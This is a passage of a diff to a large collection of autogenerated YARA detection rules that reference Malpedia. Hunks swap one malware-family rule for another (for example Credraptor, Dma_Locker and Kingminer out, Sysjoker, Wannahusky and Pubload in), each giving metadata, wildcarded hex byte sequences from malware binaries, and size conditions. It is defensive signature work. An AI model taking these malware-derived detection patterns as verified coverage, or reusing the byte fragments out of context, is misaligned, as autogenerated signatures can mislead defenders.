+		$sequence_7 = { 50 895e24 895e28 895e2c e8???????? 8b460c }
+		$sequence_8 = { 7419 8b4c2408 8b7e10 51 }
+		$sequence_9 = { ff15???????? 8d442444 83c0fe 668b4802 83c002 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 1032192
 }
-rule MALPEDIA_Win_Bbsrat_Auto : FILE
+rule MALPEDIA_Win_Penco_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0025d705-e6c3-5443-a840-3f0b2380c373"
+		id = "a328cbb1-7204-553d-a05a-a09a312a6db7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bbsrat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.penco_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "41e9d1288a6b47bf01a3af69d556bf8b74b048345c44a671654c850d84e7f7a3"
+		logic_hash = "e33ab85787ce312a011f9fd963d9c309cc71808ca3fa13b59754045a420c6308"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130155,32 +130588,32 @@ rule MALPEDIA_Win_Bbsrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c408 c3 6a00 8d442418 50 57 53 }
-		$sequence_1 = { 8bec c7451001000000 c7450c01000000 833d????????00 7516 68???????? a1???????? }
-		$sequence_2 = { 85c0 7463 8b3d???????? 6a00 6a00 6a03 6a00 }
-		$sequence_3 = { 50 8d8c24de080000 51 66898424e0080000 e8???????? 33d2 }
-		$sequence_4 = { 8b8620010000 3bc3 7407 50 ff15???????? 8b8634010000 57 }
-		$sequence_5 = { 752a 80780500 7524 80780600 751e b105 384807 }
-		$sequence_6 = { 89442404 eb04 8b442404 f7d8 1bc0 }
-		$sequence_7 = { 53 89442404 89442408 8944240c 55 8b6c241c 89442414 }
-		$sequence_8 = { 6a04 8d442420 50 6a1f 53 e8???????? e9???????? }
-		$sequence_9 = { 0f8415010000 397c2418 0f860b010000 8d642400 8b442414 8b34b8 837e0401 }
+		$sequence_0 = { ff15???????? 8d8da0fdffff 51 ff15???????? 50 6a16 }
+		$sequence_1 = { ff15???????? 8bf0 8975d8 3bf3 7e39 8d8d00010000 }
+		$sequence_2 = { 3b05???????? 731a 8bc8 83e01f c1f905 8b0c8d00263500 }
+		$sequence_3 = { 330cb500d03400 8b701c 330f 334810 33d1 894820 8b4818 }
+		$sequence_4 = { 50 6802020000 ff15???????? 85c0 7408 83c8ff e9???????? }
+		$sequence_5 = { 8b1d???????? ffd3 3bc7 0f8413010000 8b4d08 898148030000 89b94c030000 }
+		$sequence_6 = { 337004 c1eb10 89742414 0fb6f3 8b34b528f83400 }
+		$sequence_7 = { 8985bcfdffff 8b5508 81c280000000 52 8d85d8fdffff 50 ff15???????? }
+		$sequence_8 = { 8975e4 8d8d0c020000 51 ffd7 3bf0 }
+		$sequence_9 = { 83c40c 8b8554beffff 69c0c4020000 c784059c96ffff4d000000 e9???????? c7851c94ffff00000000 b901000000 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Credraptor_Auto : FILE
+rule MALPEDIA_Win_Isspace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e8ed5662-d50d-5276-970c-7ae5bc800549"
+		id = "b06e0b56-5b2e-5927-89d7-5a1fa4e89bfc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.credraptor_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.isspace_auto.yar#L1-L99"
 		license_url = "N/A"
-		logic_hash = "a2be5c2e7aba128bc464089768bae22c73dd588e7ba2a1d837a215f744aa4638"
+		logic_hash = "f9cfbe43c7bd218df762aeca13b65476ac7bccb2b29d82571f83ea3511bd9d7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130194,32 +130627,30 @@ rule MALPEDIA_Win_Credraptor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b7dfc 8945f8 83f811 0f84a4feffff eb53 837df400 }
-		$sequence_1 = { f7470400040000 7408 8b7f08 897dfc eb24 0fb607 2d9d000000 }
-		$sequence_2 = { e8???????? ff4648 8b45e8 0fb608 80b9????????70 8b7e48 7516 }
-		$sequence_3 = { ba00080000 83c408 66895112 5f 5e 5b 8be5 }
-		$sequence_4 = { 8b55ec 894804 33c9 c6400300 895008 89480c }
-		$sequence_5 = { e8???????? 01450c 83c404 f7460400200000 7429 8b4f0c 8d450c }
-		$sequence_6 = { ffd1 83c414 85c0 0f85a2020000 8b45f8 0fb64dfb 53 }
-		$sequence_7 = { ebd2 8bc3 c1f805 8d3c85c0814c00 8bf3 83e61f c1e606 }
-		$sequence_8 = { c1e108 0bc8 750a 5f 5e 8d4165 5b }
-		$sequence_9 = { e8???????? 8b9510ffffff 8bbd00ffffff 0fb6c0 018524ffffff 8d3c17 8bcb }
+		$sequence_0 = { a3???????? e8???????? 6800200300 a3???????? e8???????? }
+		$sequence_1 = { 50 81eca8000000 a1???????? 3145f8 33c5 8945e4 }
+		$sequence_2 = { 68???????? eb04 83c007 50 }
+		$sequence_3 = { 83c40c 5f c7400400000000 c70012140000 }
+		$sequence_4 = { 6870170000 ff15???????? e9???????? 6a40 6a00 68???????? e8???????? }
+		$sequence_5 = { b898a30000 e8???????? a1???????? 3145f8 }
+		$sequence_6 = { 83c404 6683f809 740c 6683f806 }
+		$sequence_7 = { 50 8d45f0 64a300000000 8965e8 c745fc00000000 ff15???????? 3d04080000 }
 
 	condition:
-		7 of them and filesize < 1728512
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Kingminer_Auto : FILE
+rule MALPEDIA_Win_Unidentified_039_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7cd7a0a-31ee-53e1-af0c-e4bec9eb4a6f"
+		id = "ff352829-d1d0-5849-83ea-58866912f4d1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kingminer_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_039_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "a1f2a6dac0d3d841d4f21da5b45b97f1a4e688102fb3e94636b9a33bdb699efe"
+		logic_hash = "d0fe8cc6956cba73b2a7ff7165daeebd2de9ab47240a59740a19b016e98dc584"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130233,32 +130664,32 @@ rule MALPEDIA_Win_Kingminer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a00 57 ff15???????? 6a00 57 ff15???????? }
-		$sequence_1 = { 752d 83791000 7514 8b4f3c 8b17 394a38 740a }
-		$sequence_2 = { d1e9 83c002 3bd1 72d1 }
-		$sequence_3 = { 6a00 52 ff15???????? 6a00 ff15???????? a1???????? }
-		$sequence_4 = { 7524 a1???????? a3???????? a1???????? c705????????6d7b0010 }
-		$sequence_5 = { 7406 33c0 5d c21000 e8???????? }
-		$sequence_6 = { 8b4704 8b15???????? 8945fc 8b07 }
-		$sequence_7 = { f3a5 ff249590640010 8bc7 ba03000000 83e904 }
-		$sequence_8 = { 50 ff15???????? 3bc7 7435 8d8de8feffff }
-		$sequence_9 = { 8b95d0feffff 2b4234 7419 83b9a000000000 7466 50 }
+		$sequence_0 = { 75f6 2bc2 d1f8 0f8596feffff c74534d66e0000 c74524a6290000 c74530f12a0000 }
+		$sequence_1 = { c745ec0d6a0000 c745e8cc1a0000 c745f065350000 c745e4cc020000 c745e0f4170000 c745dc92210000 83c0a6 }
+		$sequence_2 = { 23c1 8945f8 8b450c 8b4df4 3bc8 }
+		$sequence_3 = { 57 8b85b0070000 c74594c92f0000 c745982b7d0000 c745a080210000 c74590043b0000 c7458422170000 }
+		$sequence_4 = { 8b45f0 0bc8 894de4 8b45f4 }
+		$sequence_5 = { 23c1 8b4d9c 23c1 8b4d98 }
+		$sequence_6 = { 8b4d0c 3bc8 7d0f ff7508 ff75f4 ff15???????? 89450c }
+		$sequence_7 = { c745ec0d0a0000 8b45ec b99bc3ffff 2bc8 034df0 8b45fc 8b55e8 }
+		$sequence_8 = { 33c8 894de0 8b45ec 8b4df0 3bc8 7c0a 53 }
+		$sequence_9 = { 8b4528 05cf7b0000 33c8 894d2c 8b4530 }
 
 	condition:
-		7 of them and filesize < 165888
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Powershellrunner_Auto : FILE
+rule MALPEDIA_Win_Alreay_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "46b69b90-7940-5db2-80f3-f8192ab438b0"
+		id = "01f61c78-bfa8-5f5f-a6a2-e7995cbc405d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powershellrunner_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alreay_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "b42437163f86140159e67a0a5b01330144313dc98950bc6641d4e09d38867635"
+		logic_hash = "bcfb6d409e0586aac8c1117f30af44579c0e0ed1018da12aba1f4024fa72bbe6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130272,32 +130703,32 @@ rule MALPEDIA_Win_Powershellrunner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 498bce ff15???????? 488bd8 eb02 33db 4c8d35e900ffff 4885db }
-		$sequence_1 = { 488d058f9b0000 488bd9 483bc8 7417 8b815c010000 85c0 750d }
-		$sequence_2 = { 4053 4883ec20 8bd9 4c8d0d19300100 b901000000 4c8d0505300100 488d1506300100 }
-		$sequence_3 = { 4c8d8424a0000000 33d2 488b4c2438 ff15???????? 85c0 }
-		$sequence_4 = { 4439ac24b8000000 0f87de000000 03bc24b8000000 488b542440 4c8d1d841d0100 }
-		$sequence_5 = { 85c0 7439 488b542438 488b4c2440 e8???????? }
-		$sequence_6 = { 488b442460 488b4c2470 488d4488fc 488bc8 e8???????? 488b4c2460 488b542468 }
-		$sequence_7 = { c68424a000000033 c68424a100000036 c68424a200000039 c68424a30000003a c68424a400000026 c68424a500000030 c68424a600000055 }
-		$sequence_8 = { ff15???????? e8???????? 85c0 7426 488d442434 4889442428 c744242000000000 }
-		$sequence_9 = { 4533c0 488b542458 33c9 ff15???????? 85c0 7529 488b4c2458 }
+		$sequence_0 = { 8b742450 2bc6 f7d8 1bc0 259adaffff 5f 5e }
+		$sequence_1 = { 8d442414 45 52 50 892d???????? e8???????? 8bf0 }
+		$sequence_2 = { c1e21c 89442420 8954241c 8bc3 8bd5 e8???????? 8b4c2420 }
+		$sequence_3 = { 8ac1 f6d0 8a543418 8a5c3448 22d0 22d9 0ad3 }
+		$sequence_4 = { 89742424 7fa9 5f 5e 5d b801000000 5b }
+		$sequence_5 = { eb31 0fbf942454010000 8d442434 52 8d4c2414 50 8d542420 }
+		$sequence_6 = { 894e0c 8901 8b4c241c 8b460c 51 56 895804 }
+		$sequence_7 = { 33c3 8b5c2424 03dd 03c3 8b5c2414 8dac03d6c162ca 8b442464 }
+		$sequence_8 = { 8b8f98000000 89af90000000 83c901 899f94000000 898f98000000 8b879c000000 89879c000000 }
+		$sequence_9 = { 3d2c010000 7d1f 8d8664860000 50 e8???????? 8bd8 83c404 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 1867776
 }
-rule MALPEDIA_Win_Atlas_Agent_Auto : FILE
+rule MALPEDIA_Win_Wannahusky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8963b3c6-9ff3-517b-b17b-5c5871d182de"
+		id = "b2ad3b67-4e34-5409-83f1-3168450902fa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlas_agent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atlas_agent_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannahusky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wannahusky_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "af8db8f42863f1a21cc132a9027166c584afcbb4de297bb22cf7a2ce6f153562"
+		logic_hash = "77e82dda4e107ad0b0d473cd2e43d110eacdad7445bdb06e12858f482aa9bc9d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130311,36 +130742,32 @@ rule MALPEDIA_Win_Atlas_Agent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb60c0a 83e13c c1f902 03c1 }
-		$sequence_1 = { 8bc1 99 b903000000 f7f9 c1e002 }
-		$sequence_2 = { 4c8d0501c40200 488bd5 48c1fa06 4c893403 }
-		$sequence_3 = { 89858cfdffff c745b47e000000 c745b83e000000 c745bc23000000 }
-		$sequence_4 = { 89858cfbffff 6a00 6a00 8b8d8cfbffff e8???????? }
-		$sequence_5 = { 898590f8ffff 8b9590f8ffff 89958cf8ffff c645fc06 }
-		$sequence_6 = { 898590faffff 8b8d90faffff 51 8d8d60fbffff }
-		$sequence_7 = { 898590feffff 68???????? 8b8590feffff 50 }
-		$sequence_8 = { 4c8bf8 b9ee4d81b7 e8???????? 4883c428 }
-		$sequence_9 = { 4c8d0518650100 488bd0 488bce e8???????? }
-		$sequence_10 = { 4c8d050fcc0100 e8???????? 488bd3 8bcf }
-		$sequence_11 = { 4c8d0517810100 e8???????? 4885c0 740d }
-		$sequence_12 = { 89858cfdffff 8d8dc8fdffff e8???????? 8d8dc0fdffff }
-		$sequence_13 = { 4c8d0516270200 488bc2 83e23f 48c1f806 }
+		$sequence_0 = { eb0c 3d00010000 19c9 f7d1 83e108 d3e8 0fbe80e0184100 }
+		$sequence_1 = { c7442404ffffffff c7042400000000 e8???????? 89d9 }
+		$sequence_2 = { 8b08 e8???????? 84c0 7449 c78554fbffff00000000 a1???????? }
+		$sequence_3 = { 7405 8b08 83c11a e8???????? ba???????? e8???????? }
+		$sequence_4 = { e9???????? 8b4dc0 394dbc 7212 }
+		$sequence_5 = { 66c705????????1101 c605????????01 c705????????2c000000 c705????????80ba4100 c705????????0c1e4100 }
+		$sequence_6 = { 8d57ff 89542404 e8???????? 8b45bc 8b4db8 }
+		$sequence_7 = { 89c1 58 5b 5d e9???????? 55 }
+		$sequence_8 = { c705????????78b54100 c705????????00000000 c705????????04000000 c705????????04000000 }
+		$sequence_9 = { c705????????14000000 c705????????00484200 c705????????b41d4100 c705????????30b54100 c705????????00000000 c705????????04000000 }
 
 	condition:
-		7 of them and filesize < 857088
+		7 of them and filesize < 862208
 }
-rule MALPEDIA_Win_Karagany_Auto : FILE
+rule MALPEDIA_Win_Sysjoker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "98602626-f80c-53db-88a5-fef596efc6b3"
+		id = "c6b88483-c0cd-564a-a7b0-6f38f31ef535"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.karagany_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sysjoker_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "e11ee77bbad2aed0526f0917e5fec6612f23198efabc3eebf7b6abb2227dd310"
+		logic_hash = "d98bfbb9945f0ec0fc3cad0efe9bd86fca6a269db3916cb189ae165a81048301"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130354,32 +130781,32 @@ rule MALPEDIA_Win_Karagany_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a40 6800300000 6800000300 6a00 ff15???????? }
-		$sequence_1 = { ff15???????? 6a64 ff15???????? 5f 5e 33c0 5b }
-		$sequence_2 = { 55 8bec 81ec60060000 53 56 57 33c0 }
-		$sequence_3 = { ff15???????? 6a00 53 68???????? }
-		$sequence_4 = { 57 8bf8 6a03 57 ffd6 85c0 }
-		$sequence_5 = { c745a444000000 e8???????? 83c40c 8d45ec }
-		$sequence_6 = { 8945d0 8945d8 8945e0 8945e8 }
-		$sequence_7 = { 50 ff15???????? 6a00 53 68???????? }
-		$sequence_8 = { 6a03 53 ffd6 85c0 }
-		$sequence_9 = { 8945d8 8945e0 8945e8 8945ec 8945f4 }
+		$sequence_0 = { 51 8bc8 e8???????? c645fc08 8d4d8c 8b75a0 83fe10 }
+		$sequence_1 = { 8bc8 85c9 0f8462070000 8b01 ff500c 83c010 8945a0 }
+		$sequence_2 = { b802000000 e9???????? d9ee 84cd 0f84e2ba0000 d9e0 }
+		$sequence_3 = { 84c0 0f8496000000 8b45ec 81780424499204 0f849f000000 8b38 8945e4 }
+		$sequence_4 = { 38450b 0f45c2 0bc8 890e 8bc7 5f 5e }
+		$sequence_5 = { e8???????? 8bc8 85c9 0f84f2030000 8b01 8b400c ffd0 }
+		$sequence_6 = { c745d40f000000 c645c000 8b55ec 83fa10 0f8221060000 8b4dd8 42 }
+		$sequence_7 = { 56 8b7508 8bd9 57 85f6 7832 8b3b }
+		$sequence_8 = { 50 e8???????? 8b75e4 807e0d00 750e 8d4610 50 }
+		$sequence_9 = { c645fc1c e9???????? 52 51 e8???????? 83c408 e9???????? }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 832512
 }
-rule MALPEDIA_Win_Dma_Locker_Auto : FILE
+rule MALPEDIA_Win_Mulcom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e2af925-42e5-5846-8ffd-3d54f6df360b"
+		id = "4a9d49d8-b0ca-5241-8b60-6dc35ab732b6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dma_locker_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mulcom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mulcom_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "3ae5bccd6371af15118f93027d88904afa2d354f640add9013354700a19edfc8"
+		logic_hash = "372ee2b3e45726bdecfcc73339ca35421a12f3ab3e84538dcc5c7a553f146e2b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130393,32 +130820,32 @@ rule MALPEDIA_Win_Dma_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 6804010000 8d8c24b0060000 51 56 ff15???????? 8d8424ac060000 }
-		$sequence_1 = { 6a00 ffd7 50 6a00 56 6a0f 6896000000 }
-		$sequence_2 = { eb88 8bff 55 8bec 83ec10 a1???????? 33d2 }
-		$sequence_3 = { c744243c08020000 ff15???????? 85c0 7440 8b742418 }
-		$sequence_4 = { 75f9 2bc2 56 50 8d85fcefffff 6a01 }
-		$sequence_5 = { 8b4340 83c40c 50 68???????? eb3e 83f806 7543 }
-		$sequence_6 = { 3bc8 7345 8b4e08 8d95ccefffff 3bca 7738 8bda }
-		$sequence_7 = { e8???????? 6a1c e8???????? 83c404 85c0 7452 }
-		$sequence_8 = { 83c404 894604 85c0 7414 8b750c b967000000 }
-		$sequence_9 = { 6a00 6a01 6a00 68???????? 8d5f14 53 893d???????? }
+		$sequence_0 = { 488b442448 4839442440 0f84fc010000 488d15136d0300 488d4dc8 e8???????? 90 }
+		$sequence_1 = { e8???????? 488d4c2450 48837c246810 480f434c2450 4c897c2438 4c897c2430 895c2428 }
+		$sequence_2 = { 740b 488d4900 83c102 d1ea 75f9 4183f802 }
+		$sequence_3 = { 4533c9 33c9 448d4602 41ffd5 85c0 0f85c9050000 33c0 }
+		$sequence_4 = { 488b05???????? 4833c4 488985a0040000 4c8b9508050000 488d056c5f0200 0f1000 4c8bd9 }
+		$sequence_5 = { 85c9 7835 8b542438 85d2 782d 448b44243c 4585c0 }
+		$sequence_6 = { ff15???????? 0f104588 0f1145c8 0f104d98 0f114dd8 660f6f05???????? f30f7f4598 }
+		$sequence_7 = { 48c1e83f 4803d0 49ba8661188661188601 493bd2 0f84f9010000 4c8d7a01 488b4e10 }
+		$sequence_8 = { 488bcb e8???????? 4883ef01 75c9 488bc3 488b5c2448 4883c430 }
+		$sequence_9 = { 49baa1a0a0a0a0a0a0a0 4c8bf1 498bc2 488b4908 498be8 49f7e9 }
 
 	condition:
-		7 of them and filesize < 532480
+		7 of them and filesize < 867328
 }
-rule MALPEDIA_Win_Fast_Pos_Auto : FILE
+rule MALPEDIA_Win_Younglotus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5897ada5-fa61-53c9-92cd-a8ff361bb8f1"
+		id = "511ee3c4-3a8d-5982-a129-c4f520bbe10e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fast_pos_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.younglotus_auto.yar#L1-L173"
 		license_url = "N/A"
-		logic_hash = "ad79c209e4e736c9fd75da8ae33e4c5c82b2aa09007c974afa8089a55c049530"
+		logic_hash = "22c4cfdc7fd425b818daae07117ab2b0a1f6250b75eb7983096dfb11564bd4bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130432,73 +130859,79 @@ rule MALPEDIA_Win_Fast_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837efc00 8d56fc 8bc8 7c1f }
-		$sequence_1 = { 8b95e4feffff 8bcf 83c2f0 8d420c f00fc108 49 85c9 }
-		$sequence_2 = { 8b95e4feffff 83c408 83c2f0 8bcf 8d420c f00fc108 }
-		$sequence_3 = { ff15???????? 50 ff36 8d85e0feffff }
-		$sequence_4 = { 50 8d85ecfeffff 50 6a00 6a00 68???????? ffb5e8feffff }
-		$sequence_5 = { c785e0feffff01000000 c785e8feffff00000000 c785e4feffff04010000 ff15???????? 85c0 7558 }
-		$sequence_6 = { ff5004 80bdebfeffff00 7432 8d8de4feffff e8???????? ff30 }
-		$sequence_7 = { 8d4710 8b4ef4 41 51 56 51 }
-		$sequence_8 = { c785e8feffff01000000 e8???????? 83c40c 8bc6 }
-		$sequence_9 = { 6a64 8d4580 c745fc00000000 50 89b578ffffff c7857cffffff00000000 ff15???????? }
+		$sequence_0 = { 6802000080 e8???????? 83c41c 6a01 }
+		$sequence_1 = { 8945fc 8b4dfc 3b4d0c 7d26 }
+		$sequence_2 = { 8b55fc 8b4210 50 ff15???????? 8b4dfc 8981b4000000 }
+		$sequence_3 = { 8b45fc 8b484c 51 ff15???????? 8be5 5d c3 }
+		$sequence_4 = { 837df800 740a 8b4df8 51 ff15???????? 32c0 e9???????? }
+		$sequence_5 = { 7511 c645e000 8b45e0 25ff000000 e9???????? }
+		$sequence_6 = { 8d55dc 52 ff15???????? 8d45d0 50 }
+		$sequence_7 = { 8b4de8 894d98 8b5598 52 }
+		$sequence_8 = { 56 57 68???????? ff15???????? 8945dc 68???????? }
+		$sequence_9 = { ff7514 e8???????? 59 be02000080 }
+		$sequence_10 = { 8bf8 8b45fc 33c9 6a04 6800100000 894704 894f0c }
+		$sequence_11 = { ff74240c 6a00 56 e8???????? 6a00 }
+		$sequence_12 = { 85c0 7509 ff75d4 ff55d0 8975e0 834dfcff }
+		$sequence_13 = { ff7514 6a02 68???????? 50 56 e8???????? 83c41c }
+		$sequence_14 = { ffd3 85c0 8945fc 7514 6a04 57 ff7650 }
+		$sequence_15 = { ff742404 ff15???????? 83f8ff 750e ff15???????? 83f802 7503 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Unidentified_075_Auto : FILE
+rule MALPEDIA_Win_Pubload_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "147c0d53-aecb-5cae-ac7f-14d52d3c203f"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_075_auto.yar#L1-L115"
+		id = "741d7af0-0900-5fc5-83bc-80e761b9b4ce"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubload"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pubload_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "10617fdfd534147bc5e0f7e922724e69d45c37af66d21f98c629fa1bac685120"
+		logic_hash = "5f25f978a9edba85952ac66b5108bbd65875055e22860f7df1e90762255be210"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c40c 6808020000 8d95dcf6ffff 52 6a00 }
-		$sequence_1 = { 8bc1 5e 5d c3 55 8bec ff15???????? }
-		$sequence_2 = { 52 e8???????? 6a00 8d85ace6ffff 50 8d8dbceeffff 51 }
-		$sequence_3 = { 83c40c 33c0 668985d4f4ffff 6806020000 }
-		$sequence_4 = { 837d9400 740d 8b55fc c7821002000000000000 837df000 }
-		$sequence_5 = { 52 ff15???????? 83c410 b853000000 66898550ffffff }
-		$sequence_6 = { 33c0 668945d0 8d4dd4 51 }
-		$sequence_7 = { 742c 8b4514 85c0 7421 }
-		$sequence_8 = { 85c0 0f8431ffffff b901000000 85c9 0f8515ffffff }
-		$sequence_9 = { 81eca4000000 894dfc c745f400000000 c745f800000000 }
+		$sequence_0 = { 6a5c 68???????? e8???????? 83c408 33c9 }
+		$sequence_1 = { 6a00 ff15???????? 6a5c 68???????? e8???????? 83c408 33c9 }
+		$sequence_2 = { 6804010000 68???????? 6a00 ff15???????? 6a5c 68???????? }
+		$sequence_3 = { ff15???????? 6a5c 68???????? e8???????? 83c408 33c9 }
+		$sequence_4 = { 68???????? e8???????? 83c408 33c9 68???????? }
+		$sequence_5 = { 6804010000 68???????? 6a00 ff15???????? 6a5c 68???????? e8???????? }
+		$sequence_6 = { e8???????? 83c408 33c9 68???????? }
+		$sequence_7 = { 68???????? e8???????? 83c408 33c9 68???????? 66894802 ff15???????? }
+		$sequence_8 = { 83c408 33c9 68???????? 66894802 ff15???????? }
+		$sequence_9 = { 6a00 6a00 6a00 ff15???????? c3 }
 
 	condition:
